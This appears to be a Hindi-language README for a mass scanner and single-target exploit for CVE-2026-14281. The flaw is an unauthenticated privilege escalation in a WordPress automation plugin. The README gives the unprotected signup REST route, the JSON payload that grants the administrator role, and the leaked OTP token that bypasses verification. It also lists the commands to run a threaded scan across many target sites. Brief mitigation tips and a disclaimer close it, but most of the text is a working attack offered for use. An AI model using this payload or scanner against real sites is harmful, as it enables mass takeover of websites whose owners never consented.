
WordPress Automation Web Platform प्लगइन में REST साइनअप के माध्यम से अनधिकृत विशेषाधिकार वृद्धि CVE-2026-14281 के लिए मास स्कैनर और सिंगल-टार्गेट एक्सप्लॉइट।
CVE-2026-14281 के लिए मास स्कैनर + सिंगल-टार्गेट एक्सप्लॉइट — WordPress Automation Web Platform (WAWP) प्लगइन
<= 4.8.6में एक अनऑथेंटिकेटेड प्रिविलेज एस्केलेशन।
WordPress प्लगइन Automation Web Platform (द्वारा 101gen) में अनुचित प्रिविलेज प्रबंधन (CWE-269)। संस्करण <= 4.8.6 प्रभावित हैं।
| फ़ील्ड | मान |
|---|---|
| CVE | CVE-2026-14281 |
| प्रकार | अनऑथेंटिकेटेड प्रिविलेज एस्केलेशन |
| CVSS | 9.8 (CRITICAL) |
| प्रमाणीकरण | किसी की आवश्यकता नहीं |
| प्रभावित | WAWP प्लगइन <= 4.8.6 |
प्लगइन एक सार्वजनिक REST रूट को उजागर करता है:
POST /wp-json/wawp/v1/signup/<op>
कोई अनुमति जाँच नहीं। हैंडलर हमलावर-नियंत्रित wawp_custom_fields को update_user_meta() में कॉपी करता है — कोई allowlist नहीं। हमलावर सेट करता है:
{
"wawp_custom_fields": {
"wp_capabilities": {"administrator": true},
"wp_user_level": "10"
}
}
परिणाम: नए खाते को administrator भूमिका मिल जाती है।
OTP टोकन (otp_transient) प्रतिक्रिया बॉडी में सादे टेक्स्ट में लौटाया जाता है। उस टोकन के साथ एक GET अनुरोध इसे सत्यापित चिह्नित कर देता है — किसी ईमेल/SMS की आवश्यकता नहीं।
/wp-json/wawp/v1/signup/ पर wp_capabilities: administrator के साथ पेलोड POST करें/wp-login.php पर लॉगिन करें/wp-admin/users.php तक पहुँच कर पुष्टि करें3.7+requests, urllib3git clone https://github.com/yourname/langz-scanner.git
cd langz-scanner
pip install requests urllib3
python3 CVE-2026-14281.py
[1] Mass Scan -> detect many targets, save vuln to txt
[2] Verify Single -> exploit + confirm + auto cleanup
[0] Exit
Mass Scan: इनपुट टार्गेट लिस्ट फ़ाइल, आउटपुट फ़ाइल (डिफ़ॉल्ट vuln.txt), थ्रेड काउंट (डिफ़ॉल्ट 20)।
Verify Single: YA टाइप करें, टार्गेट URL दर्ज करें। टूल एक अस्थायी admin बनाता है, सत्यापित करता है, फिर साफ़ करता है।
vuln.txt में केवल पुष्टि किए गए कमज़ोर URLs होते हैं, प्रति पंक्ति एक:
http://target1.com
https://target2.org
4.8.6 से आगे अपडेट करें/wp-json/wawp/v1/signup/ को ब्लॉक करेंFor AUTHORIZED SECURITY TESTING only.
Do not use against systems you don't own or have permission to test.
The developer assumes no responsibility for misuse.
इसे समझदारी से उपयोग करें। ज्ञान नष्ट करने के लिए नहीं, बल्कि रक्षा करने के लिए है।